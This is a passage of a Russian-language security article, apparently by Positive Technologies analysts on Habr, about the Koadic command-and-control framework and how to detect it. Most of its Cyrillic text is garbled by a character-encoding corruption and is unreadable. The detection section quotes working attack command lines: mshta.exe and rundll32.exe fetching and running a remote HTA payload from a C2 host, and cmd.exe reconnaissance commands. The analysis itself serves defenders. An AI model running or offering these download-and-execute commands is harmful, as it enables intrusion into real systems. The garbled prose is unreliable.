ΠΡΠ»ΠΈΡΠΈΡΠ΅Π»ΡΠ½ΠΎΠΉ ΠΎΡΠΎΠ±Π΅Π½Π½ΠΎΡΡΡΡ Koadic ΡΠ²Π»ΡΠ΅ΡΡΡ ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ Π²ΡΡΡΠΎΠ΅Π½Π½ΡΡ Π² Windows ΠΈΠ½ΡΠ΅ΡΠΏΡΠ΅ΡΠ°ΡΠΎΡΠΎΠ² JavaScript ΠΈ VBScript. Π ΡΡΠΎΠΌ ΡΠΌΡΡΠ»Π΅ ΠΎΠ½ ΡΠ»Π΅Π΄ΡΠ΅Ρ ΡΡΠ΅Π½Π΄Ρ living off the land β ΡΠΎ Π΅ΡΡΡ Π½Π΅ ΠΈΠΌΠ΅Π΅Ρ Π²Π½Π΅ΡΠ½ΠΈΡ Π·Π°Π²ΠΈΡΠΈΠΌΠΎΡΡΠ΅ΠΉ ΠΈ ΠΏΠΎΠ»ΡΠ·ΡΠ΅ΡΡΡ ΡΡΠ°Π½Π΄Π°ΡΡΠ½ΡΠΌΠΈ ΡΡΠ΅Π΄ΡΡΠ²Π°ΠΌΠΈ Windows. ΠΡΠΎ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ Π΄Π»Ρ ΠΏΠΎΠ»Π½ΠΎΡΠ΅Π½Π½ΠΎΠ³ΠΎ Command & Control (CnC), ΠΏΠΎΡΠΊΠΎΠ»ΡΠΊΡ ΠΏΠΎΡΠ»Π΅ Π·Π°ΡΠ°ΠΆΠ΅Π½ΠΈΡ Π½Π° ΠΌΠ°ΡΠΈΠ½Ρ ΡΡΡΠ°Π½Π°Π²Π»ΠΈΠ²Π°Π΅ΡΡΡ Β«ΠΈΠΌΠΏΠ»Π°Π½ΡΒ», ΠΏΠΎΠ·Π²ΠΎΠ»ΡΡΡΠΈΠΉ Π΅Π΅ ΠΊΠΎΠ½ΡΡΠΎΠ»ΠΈΡΠΎΠ²Π°ΡΡ. Π’Π°ΠΊΠ°Ρ ΠΌΠ°ΡΠΈΠ½Π°, Π² ΡΠ΅ΡΠΌΠΈΠ½ΠΎΠ»ΠΎΠ³ΠΈΠΈ Koadic, Π½Π°Π·ΡΠ²Π°Π΅ΡΡΡ Β«Π·ΠΎΠΌΠ±ΠΈΒ». ΠΡΠΈ Π½Π΅Ρ Π²Π°ΡΠΊΠ΅ ΠΏΡΠΈΠ²ΠΈΠ»Π΅Π³ΠΈΠΉ Π΄Π»Ρ ΠΏΠΎΠ»Π½ΠΎΡΠ΅Π½Π½ΠΎΠΉ ΡΠ°Π±ΠΎΡΡ Π½Π° ΡΡΠΎΡΠΎΠ½Π΅ ΠΆΠ΅ΡΡΠ²Ρ Koadic ΠΈΠΌΠ΅Π΅Ρ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ ΠΈΡ ΠΏΠΎΠ΄Π½ΡΡΡ, ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡ ΡΠ΅Ρ Π½ΠΈΠΊΠΈ ΠΎΠ±Ρ ΠΎΠ΄Π° ΠΊΠΎΠ½ΡΡΠΎΠ»Ρ ΡΡΠ΅ΡΠ½ΡΡ Π·Π°ΠΏΠΈΡΠ΅ΠΉ (UAC bypass).
Π ΠΈΡ. 10. ΠΠΎΠΌΠ°Π½Π΄Π½Π°Ρ ΠΎΠ±ΠΎΠ»ΠΎΡΠΊΠ° Koadic
ΠΠ΅ΡΡΠ²Π° Π΄ΠΎΠ»ΠΆΠ½Π° ΡΠ°ΠΌΠ° ΠΈΠ½ΠΈΡΠΈΠΈΡΠΎΠ²Π°ΡΡ ΠΎΠ±ΡΠ΅Π½ΠΈΠ΅ Ρ ΡΠ΅ΡΠ²Π΅ΡΠΎΠΌ Command & Control. ΠΠ»Ρ ΡΡΠΎΠ³ΠΎ Π΅ΠΉ Π½Π΅ΠΎΠ±Ρ ΠΎΠ΄ΠΈΠΌΠΎ ΠΎΠ±ΡΠ°ΡΠΈΡΡΡΡ ΠΏΠΎ Π·Π°ΡΠ°Π½Π΅Π΅ ΠΏΠΎΠ΄Π³ΠΎΡΠΎΠ²Π»Π΅Π½Π½ΠΎΠΌΡ URI ΠΈ ΠΏΠΎΠ»ΡΡΠΈΡΡ ΠΎΡΠ½ΠΎΠ²Π½ΠΎΠ΅ ΡΠ΅Π»ΠΎ Koadic Ρ ΠΏΠΎΠΌΠΎΡΡΡ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΈΠ· ΡΡΠ΅ΠΉΠ΄ΠΆΠ΅ΡΠΎΠ². ΠΠ° ΡΠΈΡ. 11 ΠΏΠΎΠΊΠ°Π·Π°Π½ ΠΏΡΠΈΠΌΠ΅Ρ Π΄Π»Ρ ΡΡΠ΅ΠΉΠ΄ΠΆΠ΅ΡΠ° mshta.
Π ΠΈΡ. 11. ΠΠ½ΠΈΡΠΈΠ°Π»ΠΈΠ·Π°ΡΠΈΡ ΡΠ΅ΡΡΠΈΠΈ Ρ CnC-ΡΠ΅ΡΠ²Π΅ΡΠΎΠΌ
ΠΠΎ ΠΏΠ΅ΡΠ΅ΠΌΠ΅Π½Π½ΠΎΠΉ WS ΠΎΡΠ²Π΅ΡΠ° ΡΡΠ°Π½ΠΎΠ²ΠΈΡΡΡ ΠΏΠΎΠ½ΡΡΠ½ΠΎ, ΡΡΠΎ ΠΈΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ ΠΏΡΠΎΠΈΡΡ ΠΎΠ΄ΠΈΡ ΡΠ΅ΡΠ΅Π· WScript.Shell, Π° ΠΏΠ΅ΡΠ΅ΠΌΠ΅Π½Π½ΡΠ΅ STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ΡΠΎΠ΄Π΅ΡΠΆΠ°Ρ ΠΊΠ»ΡΡΠ΅Π²ΡΡ ΠΈΠ½ΡΠΎΡΠΌΠ°ΡΠΈΡ ΠΎ ΠΏΠ°ΡΠ°ΠΌΠ΅ΡΡΠ°Ρ ΡΠ΅ΠΊΡΡΠ΅ΠΉ ΡΠ΅ΡΡΠΈΠΈ. ΠΡΠΎ ΠΏΠ΅ΡΠ²Π°Ρ ΠΏΠ°ΡΠ° Π·Π°ΠΏΡΠΎΡ-ΠΎΡΠ²Π΅Ρ Π² HTTP-ΡΠΎΠ΅Π΄ΠΈΠ½Π΅Π½ΠΈΠΈ Ρ CnC-ΡΠ΅ΡΠ²Π΅ΡΠΎΠΌ. ΠΠΎΡΠ»Π΅Π΄ΡΡΡΠΈΠ΅ Π·Π°ΠΏΡΠΎΡΡ ΡΠ²ΡΠ·Π°Π½Ρ Π½Π΅ΠΏΠΎΡΡΠ΅Π΄ΡΡΠ²Π΅Π½Π½ΠΎ Ρ ΡΡΠ½ΠΊΡΠΈΠΎΠ½Π°Π»ΡΠ½ΠΎΡΡΡΡ Π²ΡΠ·ΡΠ²Π°Π΅ΠΌΡΡ ΠΌΠΎΠ΄ΡΠ»Π΅ΠΉ (ΠΈΠΌΠΏΠ»Π°Π½ΡΠΎΠ²). ΠΡΠ΅ ΠΌΠΎΠ΄ΡΠ»ΠΈ Koadic ΡΠ°Π±ΠΎΡΠ°ΡΡ ΡΠΎΠ»ΡΠΊΠΎ Ρ Π°ΠΊΡΠΈΠ²Π½ΠΎΠΉ ΡΠ΅ΡΡΠΈΠ΅ΠΉ c CnC.
Mimikatz
Π’Π°ΠΊ ΠΆΠ΅, ΠΊΠ°ΠΊ CME ΡΠ°Π±ΠΎΡΠ°Π΅Ρ Ρ Bloodhound, Koadic ΡΠ°Π±ΠΎΡΠ°Π΅Ρ Ρ Mimikatz ΠΊΠ°ΠΊ Ρ ΠΎΡΠ΄Π΅Π»ΡΠ½ΠΎΠΉ ΠΏΡΠΎΠ³ΡΠ°ΠΌΠΌΠΎΠΉ ΠΈ ΠΈΠΌΠ΅Π΅Ρ Π½Π΅ΡΠΊΠΎΠ»ΡΠΊΠΎ ΡΠΏΠΎΡΠΎΠ±ΠΎΠ² Π΅Π΅ Π·Π°ΠΏΡΡΠΊΠ°. ΠΠΈΠΆΠ΅ ΠΏΡΠ΅Π΄ΡΡΠ°Π²Π»Π΅Π½Π° ΠΏΠ°ΡΠ° Π·Π°ΠΏΡΠΎΡ-ΠΎΡΠ²Π΅Ρ Π΄Π»Ρ Π·Π°Π³ΡΡΠ·ΠΊΠΈ ΠΈΠΌΠΏΠ»Π°Π½ΡΠ° Mimikatz.
Π ΠΈΡ. 12. ΠΠ΅ΡΠ΅Π΄Π°ΡΠ° Mimikatz Π² Koadic
ΠΠΎΠΆΠ½ΠΎ Π·Π°ΠΌΠ΅ΡΠΈΡΡ, ΠΊΠ°ΠΊ ΠΈΠ·ΠΌΠ΅Π½ΠΈΠ»ΡΡ ΡΠΎΡΠΌΠ°Ρ URI Π² Π·Π°ΠΏΡΠΎΡΠ΅. Π Π½Π΅ΠΌ ΠΏΠΎΡΠ²ΠΈΠ»ΠΎΡΡ Π·Π½Π°ΡΠ΅Π½ΠΈΠ΅ Ρ ΠΏΠ΅ΡΠ΅ΠΌΠ΅Π½Π½ΠΎΠΉ csrf, ΠΊΠΎΡΠΎΡΠ°Ρ ΠΎΡΠ²Π΅ΡΠ°Π΅Ρ Π·Π° Π²ΡΠ±ΡΠ°Π½Π½ΡΠΉ ΠΌΠΎΠ΄ΡΠ»Ρ. ΠΠ΅ ΠΎΠ±ΡΠ°ΡΠ°ΠΉΡΠ΅ Π²Π½ΠΈΠΌΠ°Π½ΠΈΠ΅ Π½Π° Π΅Π΅ ΠΈΠΌΡ; Π²ΡΠ΅ ΠΌΡ Π·Π½Π°Π΅ΠΌ, ΡΡΠΎ ΠΏΠΎΠ΄ CSRF ΠΎΠ±ΡΡΠ½ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡΡ Π΄ΡΡΠ³ΠΎΠ΅. Π ΠΎΡΠ²Π΅Ρ ΠΏΡΠΈΡΠ»ΠΎ Π²ΡΠ΅ ΡΠΎ ΠΆΠ΅ ΠΎΡΠ½ΠΎΠ²Π½ΠΎΠ΅ ΡΠ΅Π»ΠΎ Koadic, Π² ΠΊΠΎΡΠΎΡΠΎΠ΅ Π΄ΠΎΠ±Π°Π²ΠΈΠ»ΡΡ ΠΊΠΎΠ΄, ΡΠ²ΡΠ·Π°Π½Π½ΡΠΉ Ρ Mimikatz. ΠΠ½ Π΄ΠΎΡΡΠ°ΡΠΎΡΠ½ΠΎ Π±ΠΎΠ»ΡΡΠΎΠΉ, ΠΏΠΎΡΡΠΎΠΌΡ ΡΠ°ΡΡΠΌΠΎΡΡΠΈΠΌ ΠΊΠ»ΡΡΠ΅Π²ΡΠ΅ ΠΌΠΎΠΌΠ΅Π½ΡΡ. ΠΠ΅ΡΠ΅Π΄ Π½Π°ΠΌΠΈ Π·Π°ΠΊΠΎΠ΄ΠΈΡΠΎΠ²Π°Π½Π½Π°Ρ Π² base64 Π±ΠΈΠ±Π»ΠΈΠΎΡΠ΅ΠΊΠ° Mimikatz, ΡΠ΅ΡΠΈΠ°Π»ΠΈΠ·ΠΎΠ²Π°Π½Π½ΡΠΉ .NET-ΠΊΠ»Π°ΡΡ, ΠΊΠΎΡΠΎΡΡΠΉ Π±ΡΠ΄Π΅Ρ Π΅Π΅ ΠΈΠ½ΠΆΠ΅ΠΊΡΠΈΡΠΎΠ²Π°ΡΡ, ΠΈ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΡ Π΄Π»Ρ Π·Π°ΠΏΡΡΠΊΠ° Mimikatz. Π Π΅Π·ΡΠ»ΡΡΠ°Ρ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΏΠ΅ΡΠ΅Π΄Π°Π΅ΡΡΡ ΠΏΠΎ ΡΠ΅ΡΠΈ Π² ΠΎΡΠΊΡΡΡΠΎΠΌ Π²ΠΈΠ΄Π΅.
Π ΠΈΡ. 13. Π Π΅Π·ΡΠ»ΡΡΠ°Ρ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ Mimikatz Π½Π° ΡΠ΄Π°Π»Π΅Π½Π½ΠΎΠΉ ΠΌΠ°ΡΠΈΠ½Π΅
Exec_cmd
Π Koadic ΡΠ°ΠΊΠΆΠ΅ Π΅ΡΡΡ ΠΌΠΎΠ΄ΡΠ»ΠΈ, ΡΠΏΠΎΡΠΎΠ±Π½ΡΠ΅ ΡΠ΄Π°Π»Π΅Π½Π½ΠΎ Π²ΡΠΏΠΎΠ»Π½ΡΡΡ ΠΊΠΎΠΌΠ°Π½Π΄Ρ. ΠΠ΄Π΅ΡΡ ΠΌΡ ΡΠ²ΠΈΠ΄ΠΈΠΌ Π²ΡΠ΅ ΡΠΎΡ ΠΆΠ΅ ΠΌΠ΅ΡΠΎΠ΄ Π³Π΅Π½Π΅ΡΠ°ΡΠΈΠΈ URI ΠΈ Π·Π½Π°ΠΊΠΎΠΌΡΠ΅ ΠΏΠ΅ΡΠ΅ΠΌΠ΅Π½Π½ΡΠ΅ sid ΠΈ csrf. Π ΡΠ»ΡΡΠ°Π΅ ΠΌΠΎΠ΄ΡΠ»Ρ exec_cmd Π² ΡΠ΅Π»ΠΎ Π΄ΠΎΠ±Π°Π²Π»ΡΠ΅ΡΡΡ ΠΊΠΎΠ΄, ΠΊΠΎΡΠΎΡΡΠΉ ΡΠΏΠΎΡΠΎΠ±Π΅Π½ Π²ΡΠΏΠΎΠ»Π½ΡΡΡ shell-ΠΊΠΎΠΌΠ°Π½Π΄Ρ. ΠΠΈΠΆΠ΅ ΠΏΠΎΠΊΠ°Π·Π°Π½ ΡΠ°ΠΊΠΎΠΉ ΠΊΠΎΠ΄, ΡΠΎΠ΄Π΅ΡΠΆΠ°ΡΠΈΠΉΡΡ Π² HTTP-ΠΎΡΠ²Π΅ΡΠ΅ CnC-ΡΠ΅ΡΠ²Π΅ΡΠ°.
Π ΠΈΡ. 14. ΠΠΎΠ΄ ΠΈΠΌΠΏΠ»Π°Π½ΡΠ° exec_cmd
ΠΠ΅ΡΠ΅ΠΌΠ΅Π½Π½Π°Ρ GAWTUUGCFI ΡΠΎ Π·Π½Π°ΠΊΠΎΠΌΡΠΌ Π°ΡΡΠΈΠ±ΡΡΠΎΠΌ WS Π½Π΅ΠΎΠ±Ρ ΠΎΠ΄ΠΈΠΌΠ° Π΄Π»Ρ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ ΠΊΠΎΠ΄Π°. Π‘ Π΅Π΅ ΠΏΠΎΠΌΠΎΡΡΡ ΠΈΠΌΠΏΠ»Π°Π½Ρ Π²ΡΠ·ΡΠ²Π°Π΅Ρ shell, ΠΎΠ±ΡΠ°Π±Π°ΡΡΠ²Π°Ρ Π΄Π²Π΅ Π²Π΅ΡΠΊΠΈ ΠΊΠΎΠ΄Π° β shell.exec Ρ Π²ΠΎΠ·Π²ΡΠ°ΡΠ΅Π½ΠΈΠ΅ΠΌ Π²ΡΡ ΠΎΠ΄Π½ΠΎΠ³ΠΎ ΠΏΠΎΡΠΎΠΊΠ° Π΄Π°Π½Π½ΡΡ ΠΈ shell.run Π±Π΅Π· Π²ΠΎΠ·ΡΠ°ΡΠ΅Π½ΠΈΡ.
Koadic Π½Π΅ ΡΠ²Π»ΡΠ΅ΡΡΡ ΡΠΈΠΏΠΈΡΠ½ΡΠΌ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠΎΠΌ, Π½ΠΎ ΠΈΠΌΠ΅Π΅Ρ ΡΠ²ΠΎΠΈ Π°ΡΡΠ΅ΡΠ°ΠΊΡΡ, ΠΏΠΎ ΠΊΠΎΡΠΎΡΡΠΌ Π΅Π³ΠΎ ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡΠΈ Π² Π»Π΅Π³ΠΈΡΠΈΠΌΠ½ΠΎΠΌ ΡΡΠ°ΡΠΈΠΊΠ΅:
- ΠΎΡΠΎΠ±ΠΎΠ΅ ΡΠΎΡΠΌΠΈΡΠΎΠ²Π°Π½ΠΈΠ΅ HTTP-Π·Π°ΠΏΡΠΎΡΠΎΠ²,
- ΠΈΡΠΏΠΎΠ»ΡΠ·ΠΎΠ²Π°Π½ΠΈΠ΅ winHttpRequests API,
- ΡΠΎΠ·Π΄Π°Π½ΠΈΠ΅ ΠΎΠ±ΡΠ΅ΠΊΡΠ° WScript.Shell ΡΠ΅ΡΠ΅Π· ActiveXObject,
- Π±ΠΎΠ»ΡΡΠΎΠ΅ ΠΈΡΠΏΠΎΠ»Π½ΡΠ΅ΠΌΠΎΠ΅ ΡΠ΅Π»ΠΎ.
ΠΠ·Π½Π°ΡΠ°Π»ΡΠ½ΠΎΠ΅ ΡΠΎΠ΅Π΄ΠΈΠ½Π΅Π½ΠΈΠ΅ ΠΈΠ½ΠΈΡΠΈΠΈΡΡΠ΅Ρ ΡΡΠ΅ΠΉΠ΄ΠΆΠ΅Ρ, ΠΏΠΎΡΡΠΎΠΌΡ ΠΏΠΎΡΠ²Π»ΡΠ΅ΡΡΡ Π²ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡΡ ΠΎΠ±Π½Π°ΡΡΠΆΠΈΠ²Π°ΡΡ Π΅Π³ΠΎ Π°ΠΊΡΠΈΠ²Π½ΠΎΡΡΡ ΡΠ΅ΡΠ΅Π· ΡΠΎΠ±ΡΡΠΈΡ Windows. ΠΠ»Ρ mshta ΡΡΠΎ ΡΠΎΠ±ΡΡΠΈΠ΅ 4688, ΠΊΠΎΡΠΎΡΠΎΠ΅ Π³ΠΎΠ²ΠΎΡΠΈΡ ΠΎ ΡΠΎΠ·Π΄Π°Π½ΠΈΠΈ ΠΏΡΠΎΡΠ΅ΡΡΠ° Ρ Π°ΡΡΠΈΠ±ΡΡΠΎΠΌ Π·Π°ΠΏΡΡΠΊΠ°:
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
ΠΠΎ Π²ΡΠ΅ΠΌΡ Π²ΡΠΏΠΎΠ»Π½Π΅Π½ΠΈΡ Koadic ΠΌΠΎΠΆΠ½ΠΎ ΡΠ²ΠΈΠ΄Π΅ΡΡ ΠΈ Π΄ΡΡΠ³ΠΈΠ΅ ΡΠΎΠ±ΡΡΠΈΡ 4688 Ρ Π°ΡΡΠΈΠ±ΡΡΠ°ΠΌΠΈ, ΠΊΠΎΡΠΎΡΡΠ΅ ΠΎΡΠ»ΠΈΡΠ½ΠΎ Π΅Π³ΠΎ Ρ Π°ΡΠ°ΠΊΡΠ΅ΡΠΈΠ·ΡΡΡ:
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
ΠΡΠ²ΠΎΠ΄Ρ
Π’ΡΠ΅Π½Π΄ living off the land Π½Π°Π±ΠΈΡΠ°Π΅Ρ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΠΎΡΡΡ ΡΡΠ΅Π΄ΠΈ Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ². ΠΠ½ΠΈ ΠΈΡΠΏΠΎΠ»ΡΠ·ΡΡΡ Π²ΡΡΡΠΎΠ΅Π½Π½ΡΠ΅ Π² Windows ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ ΠΈ ΠΌΠ΅Ρ
Π°Π½ΠΈΠ·ΠΌΡ Π΄Π»Ρ ΡΠ²ΠΎΠΈΡ
Π½ΡΠΆΠ΄. ΠΡ Π²ΠΈΠ΄ΠΈΠΌ, ΠΊΠ°ΠΊ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΡΠ΅ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ Koadic, CrackMapExec ΠΈ Impacket, ΡΠ»Π΅Π΄ΡΡΡΠΈΠ΅ ΡΡΠΎΠΌΡ ΠΏΡΠΈΠ½ΡΠΈΠΏΡ, Π²ΡΠ΅ ΡΠ°ΡΠ΅ Π²ΡΡΡΠ΅ΡΠ°ΡΡΡΡ Π² ΠΎΡΡΠ΅ΡΠ°Ρ
ΠΎΠ± APT. Π§ΠΈΡΠ»ΠΎ ΡΠΎΡΠΊΠΎΠ² Π½Π° GitHub Ρ ΡΡΠΈΡ
ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΠΎΠ² ΡΠ°ΠΊΠΆΠ΅ ΡΠ°ΡΡΠ΅Ρ, ΠΏΠΎΡΠ²Π»ΡΡΡΡΡ Π½ΠΎΠ²ΡΠ΅ (ΡΠ΅ΠΉΡΠ°Ρ ΠΈΡ
ΡΠΆΠ΅ ΠΎΠΊΠΎΠ»ΠΎ ΡΡΡΡΡΠΈ). Π’ΡΠ΅Π½Π΄ Π½Π°Π±ΠΈΡΠ°Π΅Ρ ΠΏΠΎΠΏΡΠ»ΡΡΠ½ΠΎΡΡΡ Π² ΡΠΈΠ»Ρ ΡΠ²ΠΎΠ΅ΠΉ ΠΏΡΠΎΡΡΠΎΡΡ: Π·Π»ΠΎΡΠΌΡΡΠ»Π΅Π½Π½ΠΈΠΊΠ°ΠΌ Π½Π΅ Π½ΡΠΆΠ½Ρ ΡΡΠΎΡΠΎΠ½Π½ΠΈΠ΅ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½ΡΡ, ΠΎΠ½ΠΈ ΡΠΆΠ΅ Π΅ΡΡΡ Π½Π° ΠΌΠ°ΡΠΈΠ½Π°Ρ
ΠΆΠ΅ΡΡΠ² ΠΈ ΠΏΠΎΠΌΠΎΠ³Π°ΡΡ ΠΎΠ±Ρ
ΠΎΠ΄ΠΈΡΡ ΡΡΠ΅Π΄ΡΡΠ²Π° Π·Π°ΡΠΈΡΡ. ΠΡ ΡΠΎΡΡΠ΅Π΄ΠΎΡΠΎΡΠ΅Π½Ρ Π½Π° ΠΈΠ·ΡΡΠ΅Π½ΠΈΠΈ ΡΠ΅ΡΠ΅Π²ΠΎΠ³ΠΎ Π²Π·Π°ΠΈΠΌΠΎΠ΄Π΅ΠΉΡΡΠ²ΠΈΡ: ΠΊΠ°ΠΆΠ΄ΡΠΉ ΠΎΠΏΠΈΡΠ°Π½Π½ΡΠΉ Π²ΡΡΠ΅ ΠΈΠ½ΡΡΡΡΠΌΠ΅Π½Ρ ΠΎΡΡΠ°Π²Π»ΡΠ΅Ρ ΡΠ²ΠΎΠΈ ΡΠ»Π΅Π΄Ρ Π² ΡΠ΅ΡΠ΅Π²ΠΎΠΌ ΡΡΠ°ΡΠΈΠΊΠ΅; ΠΏΠΎΠ΄ΡΠΎΠ±Π½ΠΎΠ΅ ΠΈΡ
ΠΈΠ·ΡΡΠ΅Π½ΠΈΠ΅ ΠΏΠΎΠ·Π²ΠΎΠ»ΠΈΠ»ΠΎ Π½Π°ΠΌ Π½Π°ΡΡΠΈΡΡ Π½Π°Ρ ΠΏΡΠΎΠ΄ΡΠΊΡ
ΠΠ²ΡΠΎΡΡ:
- ΠΠ½ΡΠΎΠ½ Π’ΡΡΠΈΠ½, ΡΡΠΊΠΎΠ²ΠΎΠ΄ΠΈΡΠ΅Π»Ρ ΠΎΡΠ΄Π΅Π»Π° ΡΠΊΡΠΏΠ΅ΡΡΠ½ΡΡ ΡΠ΅ΡΠ²ΠΈΡΠΎΠ², PT Expert Security Center, Positive Technologies
- ΠΠ³ΠΎΡ ΠΠΎΠ΄ΠΌΠΎΠΊΠΎΠ², ΡΠΊΡΠΏΠ΅ΡΡ, PT Expert Security Center, Positive Technologies
ΠΡΡΠΎΡΠ½ΠΈΠΊ: habr.com